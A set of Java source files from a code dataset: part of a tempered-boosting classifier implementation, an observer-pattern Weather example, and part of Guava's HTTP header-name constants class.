allLeveragingCoefficients = new double[max_number_tree];
for (j = 0; j < max_number_tree; j++) {
allTrees[j] = (DecisionTree) all_trees.elementAt(j);
recordAllTrees[i][j] = allTrees[j];
allLeveragingCoefficients[j] =
((Double) all_leveraging_coefficients.elementAt(j)).doubleValue();
}
if (SAVE_CLASSIFIERS) save(i);
err_fin = (Double) sequence_empirical_risks.elementAt(sequence_empirical_risks.size() - 1);
perr_fin = (Double) sequence_true_risks.elementAt(sequence_true_risks.size() - 1);
card_nodes_fin =
(Integer) sequence_cardinal_nodes.elementAt(sequence_cardinal_nodes.size() - 1);
trees_fin = max_number_tree;
err_fin_MonotonicTreeGraph =
(Double)
sequence_empirical_risks_MonotonicTreeGraph.elementAt(
sequence_empirical_risks_MonotonicTreeGraph.size() - 1);
perr_fin_MonotonicTreeGraph =
(Double)
sequence_true_risks_MonotonicTreeGraph.elementAt(
sequence_true_risks_MonotonicTreeGraph.size() - 1);
v_cur.addElement(new Double(err_fin));
v_cur.addElement(new Double(perr_fin));
v_cur.addElement(new Double((double) trees_fin));
v_cur.addElement(new Double((double) card_nodes_fin));
v_cur.addElement(new Double(err_fin_MonotonicTreeGraph));
v_cur.addElement(new Double(perr_fin_MonotonicTreeGraph));
v.addElement(v_cur);
System.out.print(
"ok. \t(e-err t-err #nodes) = ("
+ DF.format(err_fin)
+ " "
+ DF.format(perr_fin)
+ " "
+ ((int) card_nodes_fin)
+ " -- "
+ DF.format(err_fin_MonotonicTreeGraph)
+ " "
+ DF.format(perr_fin_MonotonicTreeGraph)
+ ")");
System.out.println(" (" + TemperedBoostException.STATUS() + ")");
}
if (SAVE_PARAMETERS_DURING_TRAINING) {
double[] avg_sequence_empirical_risks = new double[max_number_tree];
double[] stddev_sequence_empirical_risks = new double[max_number_tree];
double[] avg_sequence_true_risks = new double[max_number_tree];
double[] stddev_sequence_true_risks = new double[max_number_tree];
double[] avg_sequence_empirical_risks_MonotonicTreeGraph = new double[max_number_tree];
double[] stddev_sequence_empirical_risks_MonotonicTreeGraph = new double[max_number_tree];
double[] avg_sequence_true_risks_MonotonicTreeGraph = new double[max_number_tree];
double[] stddev_sequence_true_risks_MonotonicTreeGraph = new double[max_number_tree];
double[] avg_sequence_min_codensity = new double[max_number_tree];
double[] stddev_sequence_min_codensity = new double[max_number_tree];
double[] avg_sequence_max_codensity = new double[max_number_tree];
double[] stddev_sequence_max_codensity = new double[max_number_tree];
double[] dumseq;
double[] avestd = new double[2];
for (j = 0; j < max_number_tree; j++) {
dumseq = new double[NUMBER_STRATIFIED_CV];
for (i = 0; i < NUMBER_STRATIFIED_CV; i++)
dumseq[i] = sequence_sequence_empirical_risks.elementAt(i).elementAt(j).doubleValue();
Statistics.avestd(dumseq, avestd);
avg_sequence_empirical_risks[j] = avestd[0];
stddev_sequence_empirical_risks[j] = avestd[1];
dumseq = new double[NUMBER_STRATIFIED_CV];
for (i = 0; i < NUMBER_STRATIFIED_CV; i++)
dumseq[i] = sequence_sequence_true_risks.elementAt(i).elementAt(j).doubleValue();
Statistics.avestd(dumseq, avestd);
avg_sequence_true_risks[j] = avestd[0];
stddev_sequence_true_risks[j] = avestd[1];
dumseq = new double[NUMBER_STRATIFIED_CV];
for (i = 0; i < NUMBER_STRATIFIED_CV; i++)
dumseq[i] =
sequence_sequence_empirical_risks_MonotonicTreeGraph
.elementAt(i)
.elementAt(j)
.doubleValue();
Statistics.avestd(dumseq, avestd);
avg_sequence_empirical_risks_MonotonicTreeGraph[j] = avestd[0];
stddev_sequence_empirical_risks_MonotonicTreeGraph[j] = avestd[1];
dumseq = new double[NUMBER_STRATIFIED_CV];
for (i = 0; i < NUMBER_STRATIFIED_CV; i++)
dumseq[i] =
sequence_sequence_true_risks_MonotonicTreeGraph
.elementAt(i)
.elementAt(j)
.doubleValue();
Statistics.avestd(dumseq, avestd);
avg_sequence_true_risks_MonotonicTreeGraph[j] = avestd[0];
stddev_sequence_true_risks_MonotonicTreeGraph[j] = avestd[1];
dumseq = new double[NUMBER_STRATIFIED_CV];
for (i = 0; i < NUMBER_STRATIFIED_CV; i++)
dumseq[i] = sequence_sequence_min_codensity.elementAt(i).elementAt(j).doubleValue();
Statistics.avestd(dumseq, avestd);
avg_sequence_min_codensity[j] = avestd[0];
stddev_sequence_min_codensity[j] = avestd[1];
dumseq = new double[NUMBER_STRATIFIED_CV];
for (i = 0; i < NUMBER_STRATIFIED_CV; i++)
dumseq[i] = sequence_sequence_max_codensity.elementAt(i).elementAt(j).doubleValue();
Statistics.avestd(dumseq, avestd);
avg_sequence_max_codensity[j] = avestd[0];
stddev_sequence_max_codensity[j] = avestd[1];
}
save(
avg_sequence_empirical_risks,
stddev_sequence_empirical_risks,
avg_sequence_true_risks,
stddev_sequence_true_risks,
avg_sequence_empirical_risks_MonotonicTreeGraph,
stddev_sequence_empirical_risks_MonotonicTreeGraph,
avg_sequence_true_risks_MonotonicTreeGraph,
stddev_sequence_true_risks_MonotonicTreeGraph,
avg_sequence_min_codensity,
stddev_sequence_min_codensity,
avg_sequence_max_codensity,
stddev_sequence_max_codensity,
index_algo - 1);
}
System.out.println("");
return v;
}
public void save(
double[] ae,
double[] se,
double[] at,
double[] st,
double[] ae_MonotonicTreeGraph,
double[] se_MonotonicTreeGraph,
double[] at_MonotonicTreeGraph,
double[] st_MonotonicTreeGraph,
double[] amincod,
double[] smincod,
double[] amaxcod,
double[] smaxcod,
int index_algo) {
String nameSave =
myDomain.myDS.pathSave + "results_" + Utils.NOW + "_Algo" + index_algo + ".txt";
int i;
FileWriter f;
try {
f = new FileWriter(nameSave);
f.write(
"#Iter\tE_em_a\tE_em_s\tE_te_a\tE_te_s\tMDT_e_a\tMDT_e_s\tMDT_t_a\tMDT_t_s\tMinc_a"
+ "\tMinc_s\tMaxc_a\tMaxc_s\n");
for (i = 0; i < ae.length; i++)
f.write(
i
+ "\t"
+ DF.format(ae[i])
+ "\t"
+ DF.format(se[i])
+ "\t"
+ DF.format(at[i])
+ "\t"
+ DF.format(st[i])
+ "\t"
+ DF.format(ae_MonotonicTreeGraph[i])
+ "\t"
+ DF.format(se_MonotonicTreeGraph[i])
+ "\t"
+ DF.format(at_MonotonicTreeGraph[i])
+ "\t"
+ DF.format(st_MonotonicTreeGraph[i])
+ "\t"
+ DF8.format(amincod[i])
+ "\t"
+ DF8.format(smincod[i])
+ "\t"
+ DF8.format(amaxcod[i])
+ "\t"
+ DF8.format(smaxcod[i])
+ "\n");
f.close();
} catch (IOException e) {
Dataset.perror("Boost.class :: Saving results error in file " + nameSave);
}
}
public void save(int split_CV) {
System.out.print(" {Saving classifier... ");
String nameSave = myDomain.myDS.pathSave + "classifiers_" + Utils.NOW + ".txt";
FileWriter f = null;
try {
f = new FileWriter(nameSave, true);
f.write(
"=====> "
+ fullName()
+ " -- Fold "
+ (split_CV + 1)
+ " / "
+ NUMBER_STRATIFIED_CV
+ ": "
+ classifierToString());
f.close();
} catch (IOException e) {
Dataset.perror("LinearBoost.class :: Saving results error in file " + nameSave);
}
System.out.print("ok.} ");
}
public String classifierToString() {
String v = "H = ";
int i;
for (i = 0; i < max_number_tree; i++) {
v += "(" + DF.format(allLeveragingCoefficients[i]) + " * T#" + i + ")";
if (i < max_number_tree - 1) v += " + ";
}
v += " (" + clamping + "), where\n\n";
for (i = 0; i < max_number_tree; i++) {
v += "T#" + i + " = " + allTrees[i].toString();
v += "\n";
}
v += "\n";
return v;
}
public DecisionTree oneTree(int iter, int split_CV) {
DecisionTree dumTree;
dumTree = new DecisionTree(iter, this, max_size_tree, split_CV);
dumTree.init(tempered_t);
dumTree.grow_heavy_first();
return dumTree;
}
// TEMPERED VERSION for reweighting
public void reweight_examples_infinite_weight(
DecisionTree dt, double mu, int split_CV, Vector<Double> all_zs) {
// triggered when some weights become infinite => restricts the support to the examples whose weights blew up
int i, ne = myDomain.myDS.train_size(split_CV), nzw = 0;
double zz, ww, dumw, totsize = 0.0, newweight;
Example ee;
Vector<Integer> indexes_infinite = new Vector<>();
double[] last_weights = new double[ne];
double gz = 0.0;
for (i = 0; i < ne; i++) {
ee = myDomain.myDS.train_example(split_CV, i);
ww = ee.current_boosting_weight; // tempered weight
last_weights[i] = ww;
try {
dumw =
Statistics.TEMPERED_PRODUCT(
ww,
Statistics.TEMPERED_EXP(
-mu * dt.output_boosting(ee) * ee.noisy_normalized_class, tempered_t),
tempered_t);
// Use the noisy class, for training (if no noise, just the regular class)
} catch (TemperedBoostException eee) {
indexes_infinite.addElement(new Integer(i));
totsize += 1.0;
TemperedBoostException.ADD(TemperedBoostException.INFINITE_WEIGHTS);
}
}
newweight = 1.0 / Math.pow(totsize, Statistics.STAR(tempered_t));
for (i = 0; i < ne; i++) {
ee = myDomain.myDS.train_example(split_CV, i);
if (indexes_infinite.contains(new Integer(i))) ee.current_boosting_weight = newweight;
else ee.current_boosting_weight = 0.0;
gz +=
ee.current_boosting_weight
* ((2.0 - tempered_t) * Statistics.H_T(last_weights[i], tempered_t)
- Statistics.H_T(ee.current_boosting_weight, tempered_t));
}
gz /= ((1.0 - tempered_t) * (1.0 - tempered_t));
grad_Z = gz;
if (adaptive_t) next_t = Math.max(0.0, Math.min(1.0, tempered_t - (grad_Z * Boost.COEFF_GRAD)));
all_zs.addElement(new Double(1.0));
}
public void reweight_examples_log_loss(DecisionTree dt, double mu, int split_CV) {
int i, ne = myDomain.myDS.train_size(split_CV);
double ww, den;
Example ee;
for (i = 0; i < ne; i++) {
ee = myDomain.myDS.train_example(split_CV, i);
ww = ee.current_boosting_weight;
den = ww + ((1.0 - ww) * Math.exp(mu * dt.unweighted_edge_training(ee)));
ee.current_boosting_weight = ww / den;
if ((ee.current_boosting_weight <= 0.0) || (ee.current_boosting_weight >= 1.0))
Dataset.perror(
"Boost.class :: example " + ee + "has weight = " + ee.current_boosting_weight);
}
}
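// Descriptive note (added for readability; notation mirrors the tempered-boosting setting this code
// implements): the method below updates each training weight roughly as
// w_i <- ( w_i (x)_t exp_t(-mu * edge_i) ) / Z_j, where (x)_t and exp_t are the tempered product and
// tempered exponential from Statistics, Z_j is the normalizer accumulated in z_j, and
// tempered_t = 1 recovers the usual AdaBoost exponential update.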
public void reweight_examples_tempered_loss(
DecisionTree dt,
double mu,
int split_CV,
Vector<Double> all_zs,
int j,
double[] min_codensity,
double[] max_codensity)
throws TemperedBoostException {
int i, ne = myDomain.myDS.train_size(split_CV), nzw = 0;
double zz, ww, dumw, z_j = 0.0, factor, minw = -1.0, expt, mindens = -1.0, maxdens = -1.0, dens;
Example ee;
boolean found = false;
double[] last_weights = new double[ne];
for (i = 0; i < ne; i++) {
ee = myDomain.myDS.train_example(split_CV, i);
ww = ee.current_boosting_weight; // tempered weight
last_weights[i] = ww;
expt = Statistics.TEMPERED_EXP(-mu * dt.unweighted_edge_training(ee), tempered_t);
dumw = Statistics.TEMPERED_PRODUCT(ww, expt, tempered_t);
// Use the noisy class, for training (if no noise, just the regular class)
if (tempered_t == 1.0) z_j += dumw;
else z_j += Math.pow(dumw, 2.0 - tempered_t);
ee.current_boosting_weight = dumw;
if (dumw == 0) {
nzw++;
TemperedBoostException.ADD(TemperedBoostException.ZERO_WEIGHTS);
}
if ((ee.current_boosting_weight != 0.0)
&& ((!found) || (ee.current_boosting_weight < minw))) {
minw = ee.current_boosting_weight;
found = true;
}
}
if ((tempered_t == 1.0) && (nzw > 0)) {
// some weights became zero for AdaBoost (t == 1): replace them with the minimal non-zero weight
z_j = 0.0;
for (i = 0; i < ne; i++) {
ee = myDomain.myDS.train_example(split_CV, i);
if (ee.current_boosting_weight == 0.0) {
ee.current_boosting_weight = minw;
TemperedBoostException.ADD(TemperedBoostException.ZERO_WEIGHTS);
}
z_j += ee.current_boosting_weight;
}
}
if (z_j == 0.0) Dataset.perror("Boost.class :: no >0 tempered weight");
if (tempered_t != 1.0) z_j = Math.pow(z_j, Statistics.STAR(tempered_t));
all_zs.addElement(new Double(z_j));
double gz = 0.0;
double pnext2, pprev2, pprev1;
for (i = 0; i < ne; i++) {
ee = myDomain.myDS.train_example(split_CV, i);
ee.current_boosting_weight /= z_j;
pprev1 = Math.pow(last_weights[i], 1.0 - tempered_t);
pprev2 = Math.pow(last_weights[i], 2.0 - tempered_t);
pnext2 = Math.pow(ee.current_boosting_weight, 2.0 - tempered_t);
gz += (pnext2 * Math.log(pnext2)) / (2.0 - tempered_t);
gz -= ee.current_boosting_weight * pprev1 * Math.log(pprev2);
if ((TemperedBoostException.MIN_WEIGHT == -1.0)
|| (ee.current_boosting_weight < TemperedBoostException.MIN_WEIGHT))
TemperedBoostException.MIN_WEIGHT = ee.current_boosting_weight;
dens = Math.pow(ee.current_boosting_weight, 2.0 - tempered_t);
if ((i == 0) || (dens < mindens)) mindens = dens;
if ((i == 0) || (dens > maxdens)) maxdens = dens;
if (Double.isNaN(ee.current_boosting_weight))
Dataset.perror("Example " + i + " has NaN weight");
}
gz /= Math.abs(1.0 - tempered_t);
grad_Z = gz;
if (adaptive_t) {
next_t = Math.max(0.0, Math.min(1.0, tempered_t - (grad_Z * Boost.COEFF_GRAD)));
System.out.print("[" + DF.format(tempered_t) + "]");
}
min_codensity[j] = mindens;
max_codensity[j] = maxdens;
}
public double ensemble_error_noise_free(
Vector all_trees,
Vector all_leveraging_coefficients,
boolean onTraining,
int split_CV,
boolean use_MonotonicTreeGraph) {
// uses the true label for all computations
if ((all_trees == null) || (all_trees.size() == 0))
Dataset.perror("Boost.class :: no trees to compute the error");
Example ee;
DecisionTree tt;
double sumerr = 0.0, output, coeff, sum, sumtree = 0.0, totedge, sum_weights = 0.0;
int i, j, ne;
if (onTraining) ne = myDomain.myDS.train_size(split_CV);
else ne = myDomain.myDS.test_size(split_CV);
if (ne == 0) Dataset.perror("DecisionTree.class :: zero sample size to compute the error");
for (i = 0; i < ne; i++) {
sumtree = 0.0;
if (onTraining) ee = myDomain.myDS.train_example(split_CV, i);
else ee = myDomain.myDS.test_example(split_CV, i);
if (onTraining) sum_weights += ee.current_boosting_weight;
for (j = 0; j < all_trees.size(); j++) {
tt = (DecisionTree) all_trees.elementAt(j);
if (use_MonotonicTreeGraph) output = tt.output_boosting_MonotonicTreeGraph(ee);
else output = tt.output_boosting(ee);
coeff = ((Double) all_leveraging_coefficients.elementAt(j)).doubleValue();
sumtree += (coeff * output);
if (clamping.equals(Algorithm.CLAMPED))
sumtree = Statistics.CLAMP_CLASSIFIER(sumtree, tempered_t);
}
if (sumtree == 0.0) {
// random guess
if (Utils.RANDOM_P_NOT_HALF() < 0.5) sumtree = -1.0;
else sumtree = 1.0;
}
if (ee.normalized_class == 0.0)
Dataset.perror("Boost.class :: Example " + ee + " has zero class");
totedge = sumtree * ee.normalized_class;
if (totedge < 0.0) sumerr += 1.0;
}
sumerr /= (double) ne;
return sumerr;
}
}
| google-research/google-research | tempered_boosting/Boost.java |
1,138 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.observer;
import java.util.ArrayList;
import java.util.List;
import lombok.extern.slf4j.Slf4j;
/**
* Weather can be observed by implementing the {@link WeatherObserver} interface and registering as
* a listener.
*/
@Slf4j
public class Weather {
private WeatherType currentWeather;
private final List<WeatherObserver> observers;
public Weather() {
observers = new ArrayList<>();
currentWeather = WeatherType.SUNNY;
}
public void addObserver(WeatherObserver obs) {
observers.add(obs);
}
public void removeObserver(WeatherObserver obs) {
observers.remove(obs);
}
/**
* Makes time pass for weather.
*/
public void timePasses() {
var enumValues = WeatherType.values();
currentWeather = enumValues[(currentWeather.ordinal() + 1) % enumValues.length];
LOGGER.info("The weather changed to {}.", currentWeather);
notifyObservers();
}
private void notifyObservers() {
for (var obs : observers) {
obs.update(currentWeather);
}
}
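// Usage sketch (hypothetical caller; assumes WeatherObserver exposes a single update(WeatherType)
// method, as invoked from notifyObservers above):
//   var weather = new Weather();
//   weather.addObserver(weatherType -> LOGGER.info("Observed {}", weatherType));
//   weather.timePasses(); // advances to the next WeatherType and notifies every observer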
}
| smedals/java-design-patterns | observer/src/main/java/com/iluwatar/observer/Weather.java |
1,139 | /*
* Copyright (C) 2011 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License
* is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
* or implied. See the License for the specific language governing permissions and limitations under
* the License.
*/
package com.google.common.net;
import com.google.common.annotations.GwtCompatible;
/**
* Contains constant definitions for the HTTP header field names. See:
*
* <ul>
* <li><a href="http://www.ietf.org/rfc/rfc2109.txt">RFC 2109</a>
* <li><a href="http://www.ietf.org/rfc/rfc2183.txt">RFC 2183</a>
* <li><a href="http://www.ietf.org/rfc/rfc2616.txt">RFC 2616</a>
* <li><a href="http://www.ietf.org/rfc/rfc2965.txt">RFC 2965</a>
* <li><a href="http://www.ietf.org/rfc/rfc5988.txt">RFC 5988</a>
* </ul>
*
* @author Kurt Alfred Kluever
* @since 11.0
*/
@GwtCompatible
@ElementTypesAreNonnullByDefault
public final class HttpHeaders {
private HttpHeaders() {}
// HTTP Request and Response header fields
/** The HTTP {@code Cache-Control} header field name. */
public static final String CACHE_CONTROL = "Cache-Control";
/** The HTTP {@code Content-Length} header field name. */
public static final String CONTENT_LENGTH = "Content-Length";
/** The HTTP {@code Content-Type} header field name. */
public static final String CONTENT_TYPE = "Content-Type";
/** The HTTP {@code Date} header field name. */
public static final String DATE = "Date";
/** The HTTP {@code Pragma} header field name. */
public static final String PRAGMA = "Pragma";
/** The HTTP {@code Via} header field name. */
public static final String VIA = "Via";
/** The HTTP {@code Warning} header field name. */
public static final String WARNING = "Warning";
// HTTP Request header fields
/** The HTTP {@code Accept} header field name. */
public static final String ACCEPT = "Accept";
/** The HTTP {@code Accept-Charset} header field name. */
public static final String ACCEPT_CHARSET = "Accept-Charset";
/** The HTTP {@code Accept-Encoding} header field name. */
public static final String ACCEPT_ENCODING = "Accept-Encoding";
/** The HTTP {@code Accept-Language} header field name. */
public static final String ACCEPT_LANGUAGE = "Accept-Language";
/** The HTTP {@code Access-Control-Request-Headers} header field name. */
public static final String ACCESS_CONTROL_REQUEST_HEADERS = "Access-Control-Request-Headers";
/** The HTTP {@code Access-Control-Request-Method} header field name. */
public static final String ACCESS_CONTROL_REQUEST_METHOD = "Access-Control-Request-Method";
/** The HTTP {@code Authorization} header field name. */
public static final String AUTHORIZATION = "Authorization";
/** The HTTP {@code Connection} header field name. */
public static final String CONNECTION = "Connection";
/** The HTTP {@code Cookie} header field name. */
public static final String COOKIE = "Cookie";
/**
* The HTTP <a href="https://fetch.spec.whatwg.org/#cross-origin-resource-policy-header">{@code
* Cross-Origin-Resource-Policy}</a> header field name.
*
* @since 28.0
*/
public static final String CROSS_ORIGIN_RESOURCE_POLICY = "Cross-Origin-Resource-Policy";
/**
* The HTTP <a href="https://tools.ietf.org/html/rfc8470">{@code Early-Data}</a> header field
* name.
*
* @since 27.0
*/
public static final String EARLY_DATA = "Early-Data";
/** The HTTP {@code Expect} header field name. */
public static final String EXPECT = "Expect";
/** The HTTP {@code From} header field name. */
public static final String FROM = "From";
/**
* The HTTP <a href="https://tools.ietf.org/html/rfc7239">{@code Forwarded}</a> header field name.
*
* @since 20.0
*/
public static final String FORWARDED = "Forwarded";
/**
* The HTTP {@code Follow-Only-When-Prerender-Shown} header field name.
*
* @since 17.0
*/
public static final String FOLLOW_ONLY_WHEN_PRERENDER_SHOWN = "Follow-Only-When-Prerender-Shown";
/** The HTTP {@code Host} header field name. */
public static final String HOST = "Host";
/**
* The HTTP <a href="https://tools.ietf.org/html/rfc7540#section-3.2.1">{@code HTTP2-Settings}
* </a> header field name.
*
* @since 24.0
*/
public static final String HTTP2_SETTINGS = "HTTP2-Settings";
/** The HTTP {@code If-Match} header field name. */
public static final String IF_MATCH = "If-Match";
/** The HTTP {@code If-Modified-Since} header field name. */
public static final String IF_MODIFIED_SINCE = "If-Modified-Since";
/** The HTTP {@code If-None-Match} header field name. */
public static final String IF_NONE_MATCH = "If-None-Match";
/** The HTTP {@code If-Range} header field name. */
public static final String IF_RANGE = "If-Range";
/** The HTTP {@code If-Unmodified-Since} header field name. */
public static final String IF_UNMODIFIED_SINCE = "If-Unmodified-Since";
/** The HTTP {@code Last-Event-ID} header field name. */
public static final String LAST_EVENT_ID = "Last-Event-ID";
/** The HTTP {@code Max-Forwards} header field name. */
public static final String MAX_FORWARDS = "Max-Forwards";
/** The HTTP {@code Origin} header field name. */
public static final String ORIGIN = "Origin";
/**
* The HTTP <a href="https://github.com/WICG/origin-isolation">{@code Origin-Isolation}</a> header
* field name.
*
* @since 30.1
*/
public static final String ORIGIN_ISOLATION = "Origin-Isolation";
/** The HTTP {@code Proxy-Authorization} header field name. */
public static final String PROXY_AUTHORIZATION = "Proxy-Authorization";
/** The HTTP {@code Range} header field name. */
public static final String RANGE = "Range";
/** The HTTP {@code Referer} header field name. */
public static final String REFERER = "Referer";
/**
* The HTTP <a href="https://www.w3.org/TR/referrer-policy/">{@code Referrer-Policy}</a> header
* field name.
*
* @since 23.4
*/
public static final String REFERRER_POLICY = "Referrer-Policy";
/**
* Values for the <a href="https://www.w3.org/TR/referrer-policy/">{@code Referrer-Policy}</a>
* header.
*
* @since 23.4
*/
public static final class ReferrerPolicyValues {
private ReferrerPolicyValues() {}
public static final String NO_REFERRER = "no-referrer";
public static final String NO_REFFERER_WHEN_DOWNGRADE = "no-referrer-when-downgrade";
public static final String SAME_ORIGIN = "same-origin";
public static final String ORIGIN = "origin";
public static final String STRICT_ORIGIN = "strict-origin";
public static final String ORIGIN_WHEN_CROSS_ORIGIN = "origin-when-cross-origin";
public static final String STRICT_ORIGIN_WHEN_CROSS_ORIGIN = "strict-origin-when-cross-origin";
public static final String UNSAFE_URL = "unsafe-url";
}
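/*
 * Illustrative usage (editor-added sketch, not part of the original class): these constants are
 * plain header names and values, so they work with any HTTP API. For example, reading the policy
 * from a java.net.http response (the response object here is hypothetical):
 *
 *   HttpResponse<String> response = ...;
 *   String policy = response.headers()
 *       .firstValue(HttpHeaders.REFERRER_POLICY)
 *       .orElse(HttpHeaders.ReferrerPolicyValues.STRICT_ORIGIN_WHEN_CROSS_ORIGIN);
 */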
/**
* The HTTP <a href="https://www.w3.org/TR/service-workers/#update-algorithm">{@code
* Service-Worker}</a> header field name.
*
* @since 20.0
*/
public static final String SERVICE_WORKER = "Service-Worker";
/** The HTTP {@code TE} header field name. */
public static final String TE = "TE";
/** The HTTP {@code Upgrade} header field name. */
public static final String UPGRADE = "Upgrade";
/**
* The HTTP <a href="https://w3c.github.io/webappsec-upgrade-insecure-requests/#preference">{@code
* Upgrade-Insecure-Requests}</a> header field name.
*
* @since 28.1
*/
public static final String UPGRADE_INSECURE_REQUESTS = "Upgrade-Insecure-Requests";
/** The HTTP {@code User-Agent} header field name. */
public static final String USER_AGENT = "User-Agent";
// HTTP Response header fields
/** The HTTP {@code Accept-Ranges} header field name. */
public static final String ACCEPT_RANGES = "Accept-Ranges";
/** The HTTP {@code Access-Control-Allow-Headers} header field name. */
public static final String ACCESS_CONTROL_ALLOW_HEADERS = "Access-Control-Allow-Headers";
/** The HTTP {@code Access-Control-Allow-Methods} header field name. */
public static final String ACCESS_CONTROL_ALLOW_METHODS = "Access-Control-Allow-Methods";
/** The HTTP {@code Access-Control-Allow-Origin} header field name. */
public static final String ACCESS_CONTROL_ALLOW_ORIGIN = "Access-Control-Allow-Origin";
/**
* The HTTP <a href="https://wicg.github.io/private-network-access/#headers">{@code
* Access-Control-Allow-Private-Network}</a> header field name.
*
* @since 31.1
*/
public static final String ACCESS_CONTROL_ALLOW_PRIVATE_NETWORK =
"Access-Control-Allow-Private-Network";
/** The HTTP {@code Access-Control-Allow-Credentials} header field name. */
public static final String ACCESS_CONTROL_ALLOW_CREDENTIALS = "Access-Control-Allow-Credentials";
/** The HTTP {@code Access-Control-Expose-Headers} header field name. */
public static final String ACCESS_CONTROL_EXPOSE_HEADERS = "Access-Control-Expose-Headers";
/** The HTTP {@code Access-Control-Max-Age} header field name. */
public static final String ACCESS_CONTROL_MAX_AGE = "Access-Control-Max-Age";
/** The HTTP {@code Age} header field name. */
public static final String AGE = "Age";
/** The HTTP {@code Allow} header field name. */
public static final String ALLOW = "Allow";
/** The HTTP {@code Content-Disposition} header field name. */
public static final String CONTENT_DISPOSITION = "Content-Disposition";
/** The HTTP {@code Content-Encoding} header field name. */
public static final String CONTENT_ENCODING = "Content-Encoding";
/** The HTTP {@code Content-Language} header field name. */
public static final String CONTENT_LANGUAGE = "Content-Language";
/** The HTTP {@code Content-Location} header field name. */
public static final String CONTENT_LOCATION = "Content-Location";
/** The HTTP {@code Content-MD5} header field name. */
public static final String CONTENT_MD5 = "Content-MD5";
/** The HTTP {@code Content-Range} header field name. */
public static final String CONTENT_RANGE = "Content-Range";
/**
* The HTTP <a href="http://w3.org/TR/CSP/#content-security-policy-header-field">{@code
* Content-Security-Policy}</a> header field name.
*
* @since 15.0
*/
public static final String CONTENT_SECURITY_POLICY = "Content-Security-Policy";
/**
* The HTTP <a href="http://w3.org/TR/CSP/#content-security-policy-report-only-header-field">
* {@code Content-Security-Policy-Report-Only}</a> header field name.
*
* @since 15.0
*/
public static final String CONTENT_SECURITY_POLICY_REPORT_ONLY =
"Content-Security-Policy-Report-Only";
/**
* The HTTP nonstandard {@code X-Content-Security-Policy} header field name. It was introduced in
* <a href="https://www.w3.org/TR/2011/WD-CSP-20111129/">CSP v.1</a> and used by Firefox until
* version 23 and by Internet Explorer 10. Use {@link #CONTENT_SECURITY_POLICY} to pass the CSP.
*
* @since 20.0
*/
public static final String X_CONTENT_SECURITY_POLICY = "X-Content-Security-Policy";
/**
* The HTTP nonstandard {@code X-Content-Security-Policy-Report-Only} header field name. It was
* introduced in <a href="https://www.w3.org/TR/2011/WD-CSP-20111129/">CSP v.1</a> and used by
* Firefox until version 23 and by Internet Explorer 10. Use {@link
* #CONTENT_SECURITY_POLICY_REPORT_ONLY} to pass the CSP.
*
* @since 20.0
*/
public static final String X_CONTENT_SECURITY_POLICY_REPORT_ONLY =
"X-Content-Security-Policy-Report-Only";
/**
* The HTTP nonstandard {@code X-WebKit-CSP} header field name. It was introduced in <a
* href="https://www.w3.org/TR/2011/WD-CSP-20111129/">CSP v.1</a> and used by Chrome until
* version 25. Use {@link #CONTENT_SECURITY_POLICY} to pass the CSP.
*
* @since 20.0
*/
public static final String X_WEBKIT_CSP = "X-WebKit-CSP";
/**
* The HTTP nonstandard {@code X-WebKit-CSP-Report-Only} header field name. It was introduced in
* <a href="https://www.w3.org/TR/2011/WD-CSP-20111129/">CSP v.1</a> and used by Chrome until
* version 25. Use {@link #CONTENT_SECURITY_POLICY_REPORT_ONLY} to pass the CSP.
*
* @since 20.0
*/
public static final String X_WEBKIT_CSP_REPORT_ONLY = "X-WebKit-CSP-Report-Only";
/**
* The HTTP <a href="https://wicg.github.io/cross-origin-embedder-policy/#COEP">{@code
* Cross-Origin-Embedder-Policy}</a> header field name.
*
* @since 30.0
*/
public static final String CROSS_ORIGIN_EMBEDDER_POLICY = "Cross-Origin-Embedder-Policy";
/**
* The HTTP <a href="https://wicg.github.io/cross-origin-embedder-policy/#COEP-RO">{@code
* Cross-Origin-Embedder-Policy-Report-Only}</a> header field name.
*
* @since 30.0
*/
public static final String CROSS_ORIGIN_EMBEDDER_POLICY_REPORT_ONLY =
"Cross-Origin-Embedder-Policy-Report-Only";
/**
* The HTTP {@code Cross-Origin-Opener-Policy} header field name.
*
* @since 28.2
*/
public static final String CROSS_ORIGIN_OPENER_POLICY = "Cross-Origin-Opener-Policy";
/** The HTTP {@code ETag} header field name. */
public static final String ETAG = "ETag";
/** The HTTP {@code Expires} header field name. */
public static final String EXPIRES = "Expires";
/** The HTTP {@code Last-Modified} header field name. */
public static final String LAST_MODIFIED = "Last-Modified";
/** The HTTP {@code Link} header field name. */
public static final String LINK = "Link";
/** The HTTP {@code Location} header field name. */
public static final String LOCATION = "Location";
/**
* The HTTP {@code Keep-Alive} header field name.
*
* @since 31.0
*/
public static final String KEEP_ALIVE = "Keep-Alive";
/**
* The HTTP <a href="https://github.com/WICG/nav-speculation/blob/main/no-vary-search.md">{@code
* No-Vary-Search}</a> header field name.
*
* @since 32.0.0
*/
public static final String NO_VARY_SEARCH = "No-Vary-Search";
/**
* The HTTP <a href="https://googlechrome.github.io/OriginTrials/#header">{@code Origin-Trial}</a>
* header field name.
*
* @since 27.1
*/
